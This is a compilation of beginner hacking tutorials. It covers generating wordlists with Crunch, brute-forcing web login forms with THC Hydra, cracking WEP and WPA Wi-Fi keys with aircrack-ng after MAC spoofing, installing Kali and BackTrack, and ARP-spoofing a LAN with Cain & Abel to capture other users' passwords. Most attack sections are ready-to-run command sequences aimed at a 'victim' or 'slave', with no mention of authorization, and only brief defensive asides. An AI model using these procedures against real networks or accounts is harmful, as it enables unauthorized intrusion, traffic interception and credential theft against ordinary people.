Wordlists With Crunch

This tutorial is going to introduce you with a Backtrack application called Crunch. In a nutshell, Crunch is a wordlist generator where you can specify a standard character set or a customized one using which Crunch will make your wordlist. Crunch can generate all possible combinations and permutations. It is mainly used for Brute-Force attacks and WPA/WPA2 WiFi cracking. In this tutorial I explain some of its main features, options and settings.
►How to Downlaoad, Extract and install
Open up a terminal and type:(You can google “Download Crunch”, and copy paste the URL instead of typing)
»wget http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/crunch-3.4.tgz
Once downloaded, we need to extract it.
»tar xvf crunch-3.4.tgz
Now we need to get into the directory and actually install it. Type:
»cd crunch3.2/
To Compile and install, Type the following two commands one after the other:
»make
»make install
►How to use Crunch
Once installed we can start generating our wordlists right away. Let’s start with a basic example:
»./crunch [minimum length] [maximum length] [charset / extra options]
For example:
»./crunch 1 5 abc123 –o wordlist.txt
First of we specify that we are using Crunch by typing “./crunch” (It’s directory). After that we specify a minimum length of 1 and maximum of 5. Now the –o [filename] option enables us to save all generated combinations to a simple text file. The “abc123” are the characters that we want the wordlist to contain. Pressing enter on the above command you will see some calculations that crunch performs using basic rules of Permutations and Combinations. It will tell you how much space will be required and the number of lines (or words) the text file will consist of. It will also tell you about the progress as it is creating the wordlist.
Similarly just by using a modified version of this example, we can create a wordlist containing all possible Phone Numbers. Depending on where you live, say if the phone numbers are 10 digits long you can specifiy both the minimum and maximum length to 10.
Apart from that, when setting up the character set, symbols are to be divided by a backslash “\\”. That is, if and when you want to use a symbol in your wordlist, just put in a backslash between other symbols so that the konsole doesn’t get confused.(You don’t need to do this for numbers and alphabets.)
For example:
»./crunch 1 5 abc\\!\\*\\( -o wordlist.txt
In this example, Crunch will ignore the backslash and take out the symbols in between for use in making the wordlist.
Moving On, Permutations can be created by using the –p switch between words, letters, numbers, symbols.
»./crunch 0 0 –p a b c
The above will create:
abc acb
bac bca
cab cba
Although a little knowledge of basic mathematics would help here, it is fairly easy to understand. When you use the permutation option there is just one thing different- It doesn’t allow repeating characters. While setting your character set normally would throw in every character in every possible place, you can use permutation if you are certain that you don’t want repeated characters. One thing you might’ve noticed is that we set min/max length even if we have a permutation, we still need to set it. As in this example, Just using 0 as the length will get you the required list without any problems (It simply uses everything it has). You can always set it according to your preference.
[Math, you can skip this] In that example we used 3 words, which will be a permutation of three. So that’s 3 objects taken 3 at a time.
In other words 3(P)3 = 3*2*1 = 6 possible combinations (without any repeating). For our purpose, we can simply think of it as a factorial. ►Splitting generated combinations into separate lists with predefined size:
If ever you need to, Crunch provides an option to create several lists each of an exact size. For this purpose we have –b switch which is designed to set the size of each file. So whenever crunch generates combinations that exceed ,for example 10mb it will place the next word into a separate file and go from there.
»./crunch 1 8 abcdABCD –b 30mb –o START
This will split all the generated combinations of “abcdABCD” in separate files, none exceeding the size of 30mb.
As always, practice is the key. This is another one of those things which you don’t quite get the hang of until you actually rub noses with it. If ever you have a doubt as to what any command does, best way to find out is to just try it out. Take a look at the help menu, or the official documentation for all the options and try out as many combinations as you can.

THC Hydra

One of the biggest security holes in any seemingly secure networks or systems are passwords. Install a $500 anti-virus, specifically hire a cyber security team, do anything and everything you can – But if your password is weak none of it will matter. THC-Hydra is a famous login cracker which supports numerous protocols to attack. It is a relatively easy to use and a highly efficient brute-forcer (Well, as efficient as a brute force attack can be). Although Brute-Force attacks are somewhat uncommon and never a recommended attack strategy, sometimes we just don’t have a choice. That’s where THC- Hydra comes in. (By the way, THC = The Hacker’s Choice)

►Installing Hydra – Much like Nessus, Hydra needs a few formalities before we can actually use it. We need to download, extract, install, and configure it. (We can do this in just a few commands) So let ‘s begin :
Open up the terminal(konsole) and type:
»wget http://freeworld.thc.org/releases/hydra-6.3-src.tar.gz
Once downloaded we now need to extract it:
»tar -xvf hydra-6.3-src.tar.gz
Now, configuring and installing (wait for the first command to complete, then type the second):
»./configure && make && install
»make install
►Using THC Hydra
(Note: If you are attacking FTP service then first make sure to run an nmap scan for any open FTP ports (by default it should be 21))
Now in order to brute-force a specific login form you need to set a username, for example a lot of networks use ‘admin’, and the admin account usually has the most privileges. (If you don’t know the username you can include a text file containing possible usernames). You also need a password wordlist, the service used for attacking and the page itself.(Read on..)
Specifying all these parameters, the attack command will look something like:
»./hydra -l admin -P /root/Words.txt website.com http-post-form “/login.php&username=^USER^&password=^PASS^”
First, you need to let the konsole know you are using hydra. Hence the “.//hydra”. Next you need to set up the various parameters and variables. The general format is first typing in the “switch”,
For example: ‘-l’ or ‘-P’ etc. And then right after a space the string or the value. The various parameters are given below :
► -l = The username
► -L = List of usernames (If you don’t know the login).
►-p = The password
►-P = The directory for the wordlists
(The -p parameter is almost never used, Why would you want to brute force if you already know the password ? -P is used almost always)
If we’re attacking a web form over http and the method is post then we use “http-post-form”. Another example, if the service is FTP simply use “ftp”. You will have to sniff around the website that you want to get access to find out exactly what it uses. Such information may be found in the URL, the “About” page or can be googled.(You can also Right click the page and click “View Source”)
Another thing you should be aware of is that the variables username and password are not always the same. They different depending on the website or service you are using. What I mean by this is while some website uses ‘admin’ another might be using ‘administrator’. Viewing the page source, you can generally easily find out in what variable they are storing the values.
This was a rather small example. Like every other tool, Hydra has a variety of parameters and options that can prove very useful in different cases and are more in number than can be discussed here. (‘Help’ command can help you explore, but there’s no substitute for actually experimenting.)
The above discussed parameters are the ones most often used. Below are a few more less common ones :
►-vV – The verbose mode. This mode shows you every login attempt hydra tries.
►-s – We specify the port on which we’re running our attack.
►-x – For brute-force parameters generation. We define our charset and minimum & maximum length of it.
►-R – Restores a previously aborted session of an attack.
►-e ns – Checks for blank or no password fields.
So an example of an advanced attack would look something like this:
»./hydra -L /root/usernames.txt
-P /root/HugeDB.txt
-e ns -vV -s 80
website.com http-post-form “/login.php&username=^USER^&password=^PASS^
(That’s all supposed to go within one command, one line)
Try deciphering what exactly this command does.

Hacking WEP – II

([For this tutorial you need external WiFi adapter] OR [have BackTrack installed in your Hard Drive, not a virtual machine])
(Otherwise, look for the method using normal windows OS in the intermediate section)
Open up BackTrack, Login and then follow the below steps
1. Open konsole and type the following to start up network connections.
»/etc/init.d/networking start
2. Now we are going to put the network card into moniter mode by typing the following.
»airmon-ng
(You will find your Interface here)
3. So first start up the scan
»airmon-ng start wlan0
or
»airmon-ng start wlan1
(this command depends on what it reads on your router or networking card as, replace as needed)
4. Lets spoof your MAC address first by typing this next command.
»ifconfig wlan1 down
»macchanger -r wlan1
»ifconfig wlan1 up
This will change the MAC address being used to the computer we are connecting to.
5. Time to start finding our victim’s router, type the following in konsole.
»airodump-ng mon0
This will show the entire list of all the WiFi connections your adapter can catch and once you find one that suits your interest, and continue:
6. Once found press CTRL + C to copy the BSSID and then get out of airodump and then type into a new konsole: (Read slowly!)
»airodump-ng -c [channel number] –bssid [the BSSID of the router] -w [new name for the cap file] mon0 (the interface we are using)
For Example: »airodump-ng -c 1 –bssid 11:22:33:44:55:66 -w Newcapfile mon0
(*IMPORTANT- You have to fill in everything between [ ] yourself, since it is different for every case. You will get the BSSID, channel number from the previois steps, ‘mon0’ or ‘mon1’ based on your adapter, and for name of cap file you can type in any file name like ‘MyCapFile’)
7. Lets start the passphrapse cracking. We need to get around 30,000-50,000 IVs(packets). We start by sending fake authentication requests. To do this open a new konsole and type:
»aireplay-ng -1 1 -a [The BSSID of the router] mon0
example: »aireplay-ng -1 1 -a 11:22:33:44:55:66 mon0
8. Almost done, we just need to contune the capturing process, open another konsole and type:
»aireplay-ng -3 -b [The BSSID of the router] mon0
Now it will start replaying ARPs. (ARP = Address Resolution protocol, it is needed to find the device address from the IP address)
Collect a good amount of IVs like around 30,000-50,000(the more the better).(Depending on the network strength, this step can take anywhere from 15 minutes to about 3 hours). It should be stored in the .cap file Once you’ve captured enough packets, type CTRL + C to stop the process and continue to step 9.
9. Time to start cracking that cap file You can think of it like every single packet contains a bit of leaked password. So we’ve captured a large number of packets, compiled them in the .cap file and now we’re going to try and find out tiny bits of information from each packet and piece it together to give us the PassPhrase. Open a new konsole and type:
»aircrack-ng -b [bssid] [file name]-01.cap
example: »aircrack-ng 11:22:33:44:55:66 wepcap-01.cap
10. Wait a few seconds and we should now be presented with the key to log in to the router.
Key Commands.
►nwlan0 = Interface (Examples: wlan0, ath0, eth0)
►nch = The channel the target is on (Examples: 6, 11 You can find out using your wifi adapter’s interface)
►nbssid = MAC Address of target (Examples: 11:22:33:B1:44:C2)
►nssid = Name of target (Examples: linksys, default)
►filename = Name of .cap file (Examples: wep123, target, anythingyoutwant)
►fragment-*.xor= The * being replaced by a number
►(Examples: fragment-25313-0123.xor)
PASSWORD DECRYPTED (Examples: PA:SS:WO:RD or 09:87:65:43:21)

Installing Kali

Around April 2014, www.backtrack-linux.org officially stopped supporting backtrack downloads. This was mainly due to the release of Kali 1.0.6 which fixed majority of the bugs in the OS. Although Backtrack is still available through torrents, it’s better to move on to newer and better things, namely, Kali.
In a nutshell, mathematics tells us the difference between windows 8 and windows 8.1 is 0.1, Similarly, Backtrack and Kali are not that different. Kali is the like the next revamped version of BackTrack. If you prefer to keep using Backtrack, you’re not exactly missing out on something huge (yet). But still, it’s always better to use up to date software, nobody knows that better than us hackers. Backtrack ruled the hacking universe for nearly 8 years (released in 2006) and now the torch is in the hands of Kali. So, here we’ll be taking a brief look at the two operating systems, their differences and advantages of Kali over Backtrack and finally how to install Kali.
Differences between Kali & BackTrack
Like I said, Kali is not so different than Backtrack. At first look, you’ll probably notice the slight GUI change. The tools are in different places but it shouldn’t take long to get used to. One major difference beginners may not notice is that Kali is built on Debian Linux instead of Ubuntu Linux. The Debian vs Ubuntu debate is a whole other topic, so we’re not getting into that. Plus, you don’t need to fill your head with unnecessary information. Kali can be thought of as the next iteration of Backtrack. The developers are the same, the functionality is almost the same and the GUI change is definitely for the better.
The advantages of Using Kali Over BackTrack
•’Some’ new tools.
•The new GNOME interface.
•Regular updates, updated tools like Metasploit, p0f etc.
•A build specifically designed for the ARM architecture (read: ‘android smarphones compatible’).
•All tool directories are in the PATH variable, so any tool can be called from anywhere.
(Also now that backtrack has no future, we don’t have that much of a choice)
There’s no game changer advantage of Kali over Backtrack. But now that Backtrack is no longer going to update, vulnerabilities will start popping up in the OS which will be fixed in Kali but not Backtrack. The last thing a hacker needs is to get hacked him/herself. Let’s install Kali now. If you’ve installed Backtrack earlier, the installation process of Kali is practically identical.
Step 1: Download & Burn Kali
Head over to: http://www.kali.org/downloads/
There are quite a few options, the only ones you need to worry about are 64 bit or 32 bit and torrent or direct download. Check out the properties page of your ‘My Computer’. If your architecture (OS and processor) are 64 bit, download the 64 bit one. If you’re not sure, you may simply download the 32-bit version which works on all systems. (If you have 4GB or less RAM, 32 bit or 64 bit doesn’t make a difference). The download is around 3GB in size.
Below on that page you’ll see two more versions, ARMEL and ARMHF. They are relevant when installing Kali on ARM hardware devices (like Android smartphones and tablets). But, right now we’re trying to get Kali running on a PC.
Once we’ve got the ISO file, you can either burn it to a DVD to install as a permanent OS on your system or you can create a bootable USB Drive using software like UNetBootin. (See the tutorial on Backtrack for exact instructions)
Step 2: Install Kali
We’ll be installing Kali on a Virtual machine. The two best virtualization systems are VMWare and Virtual Box. They are both equally good, but VMWare is paid. So, for a beginner hacker I recommend using Virtual Box. On startup, just like BackTrack, you can log in as “root” with a password of “toor”. Then, type “startx” to start the X-Windows system.
Using a virtual machine may not always be ideal. The main disadvantage is performance. Running an OS on top of another OS is bound to cause lagging. A system with 4GB RAM should handle it sufficiently well as long as no other programs are running. For optimal performance, 6GB (or more) RAM is recommend.
Further, for wireless hacking using a virtual machine, we need an external wireless card or adapter. They are usually small pen drives using which you can connect to a wifi network. Also, they must be compatible with aircrack-ng, the main wifi hacking software.
As mentioned before, you may also install it alongside your present OS so that both of them can mind their own business one at a time. To do that, you can use your burned DVD or USB drive and simply boot with the booting device jacked in. (You may need to alter the Booting Sequence through the BIOS menu).
Once the booting begins, you can click on the Install Kali button and follow the steps in the install wizard.
The disadvantages of using a VM are the advantages of using a dual boot system. Kali will run faster with less resources, you will not need an additional wireless card and you will not have the additional complexities of working in a VM. But installing another permanent OS may not be ideal for everyone. You may choose whichever method you like. If you have used another Linux distribution with the GNOME interface, you’ll notice that the pull-down menus at the top of the desktop look familiar, just like Backtrack. Also just like backtrack, we can find all the same tools (and some new ones) in the same upper left corner applications menu categorized in the same way. One interesting menu is the “Top Ten Security Tools” menu. You’ll find that it includes some of the most popular tools such as nmap, Metasploit, sqlmap, Wireshark, and aircrack-ng among others. Now you’re all set and you can start hacking with Kali Linux!
*Since Kali officially supports ARM hardware, almost all android devices can run Kali. There’s an app called ‘Linux Deploy’ on the play store which does all the heavy lifting for us. All we need to do, is set a few options and hit install. The requirements for installing Kali on android phones are : Minimum android version 2.1 (rooted), 5GB free space in any one place (internal or external storage), decent internet speed and some patience.
Here’s the URL for the Linux Deploy app:
https://play.google.com/store/apps/details?id=ru.meefik.linuxdeploy
And here’s the official tutorial for getting Kali up and running on your smartphone:
http://www.kali.org/how-to/kali-linux-android-linux-deploy
Linux Deploy basically lets the user select which Linux distribution they want to install, the processor architecture, mirror URL, installation path etc. If you simply want to get it up and running quickly, Linux deploy provides defaults that almost always work. Although very improbable, even if something does go wrong, the installation of Kali on your android phone is completely reversible. On hitting the Install button, Linux Deploy will start downloading the image file and then go on to install it.
For exact instructions, head to the official tutorial URL given above.
A few pointers: Make sure you select Kali Linux under the distribution tab. The download is approximately 2GB in size, so plan accordingly. There are two architecture types, ARMEL and ARMHF. ARMEL is for ARMv4 instruction set and ARMHF is for ARMv7 instruction set for the phone’s processor. The majority of phone today have ARMv7 (or above), but if you have a relatively old model, you may wish to google up your phone’s specifications to find out which one you can run. One last thing, around 4GB minimum is recommended for the image size but if you plan on installing a lot of tools you can manually change the image size in Linux Deploy.

Installing Backtrack

How to Install BackTrack 5(contents)
►Download the BackTrack 5 ISO
►Setting up a Virtual Machine
►Installing BackTrack 5
►BackTrack Login
►(Optional) Creating a Bootable USB Drive
►Download the BackTrack 5 ISO
Head over to: http://www.BackTrack-linux.org/downloads/ Then click the download button.
After that, you need to pick the version of BackTrack that you want. Pick the latest one, it’s BackTrack 5 R3 at the time of writing this tutorial. The window managers(KDE and Gnome) are both pretty much equal, choose any. Pick the architecture according to your system’s specs(Right click on My computer to find out, 32 bit or 64 bit) . We want the ISO file type because we can use it on a DVD, a USB flash drive, and install on a virtual machine. Direct download or torrent download is up to you. The file is little over 3 GBs, so it may take some time depending on your internet speeds.
(You’re now setting up a whole new operating system, which takes time, So I suggest you read this tutorial before beginning once completely, and then refer to it if you get stuck, it’s relatively easy)
►Setting up a Virtual Machine
A virtual machine (VM) is the software implementation of a physical computer. In other words, it’s having another computer on your current computer. If you have never used a virtual machine it is a good time to start. VMs are excellent when it comes to practicing your hacking techniques as they provide somewhat of a safe closed environment, such that any damage, if it occurs is contained within the dummy operating system, which can then be simply restarted to start afresh.
To start, you’re going to need to get VM software. There are many out there, here are a few popular ones.
VMware Player (Windows/Linux) – Free
VirtualBox (Windows/Mac/Linux) – Free
Whichever VM software you go with, make sure it has a way to network with other VMs. If you don’t want to spend the money, go with VirtualBox. If you plan to get serious with penetration testing, you might want to consider getting a VMware Workstation license. It is full of useful tools and goodies such as sharing VMs and remote access and easy to work with. The easiest to install is ‘Windows Virtual PC’, it will do for beginner purposes. These programs are very similar in function. You shouldn’t have trouble following the basic setup instructions.(Google any Virtual machine software and install it)
After everything is installed and running, click “Create new virtual machine”. (Depending on which one you install, the instructions might be a little different. If you look around there will definitely be similar options).
Next you’re going to select “Installer disc image file” then browse for the BackTrack 5 ISO.
Select the operating system as linux, and the version as Ubuntu.
Give the virtual machine a name such as “BackTrack 5 R3” and select a location for where you want to save the virtual machine files.
When asked how much you want the virtual disk drive to be, you want at least 25 GB. This will be the most demanding requirement of BackTrack 5. Although the BackTrack-linux wiki says you need at least 20 GB, I found you will run out of space by the time you install updates or any other software (Feel free to put in even 5-15 Gb, if you simply want to look around. The OS is not the big, the tools are). Then, you will have the option of storing the virtual disk as a single file, or split into multiple files. Creating a virtual disk as a single file will allocate all of the space right away. Splitting into multiple files means the drive files will grow as you need them. So if your hard drive space is limited on your host system, go with multiple files. If you have a massive drive, and not worried about space, go with a single file.
And that’s it! The virtual machine is ready to go. The recommended minimum RAM is 512 MB, however you can try lower if you need to.
Power on the virtual machine and you will be ready to install BackTrack.
►Installing BackTrack 5
If you are installing on a hard drive, you will need to burn the BackTrack 5 ISO on to a DVD or a USB Drive.
First turn on your machine, then insert your DVD or USB Drive. Then press the key that allows you to select your boot drive. You may have to go into the bios to enable this. Most often, F12 will work. Select either your DVD drive, or your USB Drive to boot from it. (You may simply use the ISO file also. Windows virtua PC, for example gives an option to simply select an ISO file and start up directly)
After a few moments, you will see BackTrack Live CD menu. Press enter on ‘BackTrack Text – Default Boot Text Mode’.
Wait about 10 seconds, and you will come to BackTrack shell console. Type the command “startx” to load the GUI.(If you directly used the ISO file without burning it to anything, your operating system will be now ready. If you prefer to burn the file to a DVD or pen drive follow the steps below)
After another few moments, you will come to the desktop of BackTrack. Double click on the “Install BackTrack” to begin the install process.
After you select your time zone, and language, you then have to partition your drive. If you are using a virtual machine, go ahead and use the whole drive. If you are dual booting, you will have to specify your partition for your two operating systems.
Continue through the installer, and then click finish. BackTrack will then install on to your system. This process takes about 10-15 minutes.
►BackTrack Login
After it is finish, restart your system.
After restarting, you will come to a login screen.
The default root name for BackTrack is “root” and the password is “toor”. After typing in the root username and password, you will come back to the BackTrack shell. Type “startx” to enter the GUI desktop, and we’re done ! I recommend you look around get a feel of all the tools and applications that come pre-installed on the amazing BackTrack OS.
►(Optional)Creating a Bootable USB Drive
Required Items:
A USB flash drive with minimum space of 4 GB.
BackTrack 5 ISO
UNetbooin – ( http://unetbootin.sourceforge.net/ )
UNetbootin is a program that allows you to create bootable USB drives for linux distros and Windows. UNetbootin will download the distribution or use an ISO file you selected from your hard drive.
Once UNetbootin is downloaded you can run it by double clicking (Windows), plug in your USB Drive.
Start UNetbooin and select the “diskimage” option, then select your BackTrack 5 ISO.
Select your USB Drive, then click “OK”.
(WARNING: This will format your USB Drive and remove all previous data.)
Now you should be able to boot off of your USB Drive with BackTrack 5.

More On Hacking WiFi

This article is fairly basic but it should give you some good background information of where and how to start and how WiFi hacking works.
Before all that, let’s take a look at some background information about the stuff involved in hacking WiFi.
IP Addresses:
People starting off in networking often get confused with this and is one of the most important and vital parts of information you will use and need. Each computer system has 2 types of the so called IP Addresses. Internal and External.
External IP Address is what your ISP assigns to your modem. The external IP Address is NOT required in Wireless Hacking.
Internal IP Address is what will be used in wireless network hacking and is the IP Address which the actual hardware router assigns to each computer. Unless specified in the router/computer settings, IP Addresses are dynamic and so will change nearly every time the computer disconnects and reconnects to the router the IP will be different.
Basic software for someone interested in Networking is an IP Scanner. Most Networking software e.g. Cain, which I will go into further, includes an IP Scanner. There are lots of Scanners out there and a quick search on google will bring up a few good ones too.
Wireless Network Hacking:
The are several different types of encryption out there but since this is a basic guide I will focus on just one and mention the other.
The one I will be focusing on here is WEP (Wired Equivalent Privacy) encryption. Hopefully, you’re not protecting your network with this, if you are, I guarantee you will soon be in a hurry to change it. See for yourself, Read on ! WEP has been demonstrated to have numerous flaws and therefore the industry is basically forcing people to change to WPA/WPA2 encryption (by limiting speed between computer and router to 54mbps on wireless routers).
The exact details of how the WEP encryption works are a bit too technical to be discussed here, All you need to know is that WEP is extremely vulnerable. (If possible, change it to WPA/WPA2 ASAP!)
MAC Filtering:
Before WPA/WPA2 came to the market and was added as a standard encryption method to routers, many people resorted to Mac Filtering as an extra layer of security.
A MAC address is just an identification string made up of numbers and characters which every device that connects to a router has. So that is all Network Adapters. MAC filtering works by only allowing computers with a certain MAC address to connect to the router. However this can be easily overcome by spoofing your MAC address with simple software which I will go into later.
The fastest and most effective way to hack a wireless WEP Network is with a piece of incredible software called Aircrack-ng (http://www.aircrack-ng.org/).
(For more info on Cracking WEP, press the back button and check out the tutorial on “Cracking WEP”.)
Once you’re in the network. The real fun begins.
Intercepting Network Information:
When information is sent anywhere on a network, the information is converted to fixed sized “packets”. These are the packets and these are what you will be intercepting.
We will look at the main type of attack which is also the easiest.It uses a piece of software called Cain & Abel (http://www.oxid.it).
Once installed Run the application. It may come up on some Anti-Viruses and May also come up with a message claiming your firewall is restricting its access. In most cases both these are errors.
You have 2 toolbars at the top. The top one with File/View/Configure/Tools/Help and the second one. The 2 main buttons you will need are located on the second toolbar and are the second and third from the left. One that looks like a motherboard (Starts/Stops Sniffer) and the other one that looks like a Nuclear icon (Starts/Stops APR).
Go ahead and click the Sniffer button located on the second toolbar second from the right. Then go ahead and click the Sniffer tab and make sure hosts is selected at the bottom tab. Then right click anywhere in the white area and click “Scan MAC addresses”. Click OK. Once this is done, if there are other computers on your network they should appear in the listbox. Highlight them all and then right click, selecting “Resolve Host-Name”. This is basically an IP scanner as I mentioned before. Giving the Internal IP Address and the Host-Name on the right to help you identify your slave.
Now you need to find out your gateway address which is the IP Address of your router. Go into CMD and type IPCONFIG and look for the gateway address. An example would be 192.161.1.1
Once thats done. Click on APR on the bottom tab. The page should now be divided into 3, with aload of APR tools on the left and then 2 separate listboxs on the right. Click on the top listbox and you will notice that on the second toolbar, that there is a blue plus icon 7 from the right. Click that.
Now a pop up with 2 listboxes will appear. On the left select your gateway Address and then on the right select your victims IP Address. Then select OK. You will now notice that they appear in the top listbox. Click on them and make sure its highlighted. Now click the Nuclear icon on the second toolbar 3 from the left. It should now start poisoning the other computer meaning all the traffic to and from that computer is going through your computer. This is called ARP spoofing. It is a computer hacking technique whereby an attacker sends fake (“spoofed”) Address Resolution Protocol (ARP) messages onto a Local Area Network. ARP spoofing allows us to intercept data frames on a LAN.
If the person is active on the computer using the network you will see the second listbox start filling up with routing packets. If you click the password tab at the bottom. Any unencrypted websites they enter their password in, will show up in that box. HTTPS/SSL websites which are encrypted will show up as usually a random string or nothing at all. Often when someone is spoofing a slave. If they visit a HTTPS website, it may come up with a warning message with commercial browsers as the SSL encryption cannot verify with the server since the software tries to replace it with a fake one. This can lead to suspicion of intrusion with the slave.
Analysing the Packets:
Now that we have all this data streaming through our computer we need another piece of software to analyze it. This is where Wireshark comes in (http://www.wireshark.org/).
Wireshark is fairly basic to use. Install it and run it. Then click on the first icon on the second toolbar. Check the box with the most packets running through it and click start.
You should now have a stream of packets flowing through. There are countless things you can now analyse and view from your slave. You have all the data which is going to and from there computer. Viewing it and analysing it can be simple but also tricky depending what your trying to find out.
Theres plenty more information on how to use Wireshark on the Wireshark wiki (http://wiki.wireshark.org/).
From here you can develop your skills and further your knowledge on networking. This sheds a light on how vulnerable our virtual privacy really is. It’s really not surprising so many people regularly use softwares like VPN’s and proxies.

Hacking WPA

WPA/WPA2 supports many types of authentication beyond pre-shared keys. aircrack-ng can ONLY crack pre-shared keys. So make sure airodump-ng shows the network as having the authentication type of PSK, otherwise, it’s simply uncrackable (yet). But most Networks do use PSK only, so your chances are good. Before continuing on just take a look at what type of protection the network has.
The only time you can crack the pre-shared key is if it is a dictionary word or relatively short in length. Conversely, if you want to have an unbreakable wireless network at home, use WPA/WPA2 and a 63 character password composed of random characters including special symbols. This is because in this Hack our only option is to use a Dictionary attack, that means literally test each and every word in a text file and checking whether it is the password. A simple google : “Dictionary attack list” will give you a text file containing all the known words, Pick the one that’s the biggest.
There is another important difference between cracking WPA/WPA2 and WEP which is the approach used to crack the WPA/WPA2 pre-shared key. Unlike WEP, where statistical methods can be used to speed up the cracking process, only plain brute force techniques can be used against WPA/WPA2. That is, because the key is not static, so collecting IVs(more packets) like when cracking WEP encryption, does not speed up the attack. The only thing that does give the information to start an attack is the handshake between client and AP. Handshaking is done when the client connects to the network and attempts to authorize. Since the pre-shared key can be from 8 to 63 characters in length, it effectively becomes impossible to crack if the password is set to anything unusual, since even an 8 character password is almost impossible to brute-force.
This means that the passphrase must be contained in the dictionary you are using to break WPA/WPA2. If it is not in the dictionary then aircrack-ng will be unable to determine the key.
Also, there is no difference between cracking WPA or WPA2 networks. The authentication methodology is basically the same between them. So the techniques you use are identical.
There’s pretty much no steps in this tutorial. All you need is the .cap file and a dictionary list.
Check out the WEP cracking tutorial, complete till step 10. Then you’ll have your .cap file which contains information about handshakes that aircrack uses to crack the key.
After you get the .cap file open up Aircrack -ng, just on the first screen find and select your .cap file, select WPA Encryption option and find and select your dictionary list. If the password is in the dictionary list, you’ll see the magic happen and the key will appear.
You can simply try googling for a Dictionary WordList, there are tons out there .Try as many as you can, and if possible compile several into one and let aircrack do it’s thing overnight. Again, cracking WPA/WPA2 is much harder so you need probability on your side to have a real chance at getting the password.
I’ve noticed that in many cases, the WPA key is simply the mobile number of our naive victim. It’s usually 10 characters, easy to remember/type and luckily for us, relatively easy to crack.
(A tutorial on creating your own wordlists easily with ‘Crunch’ can be found in the Expert category)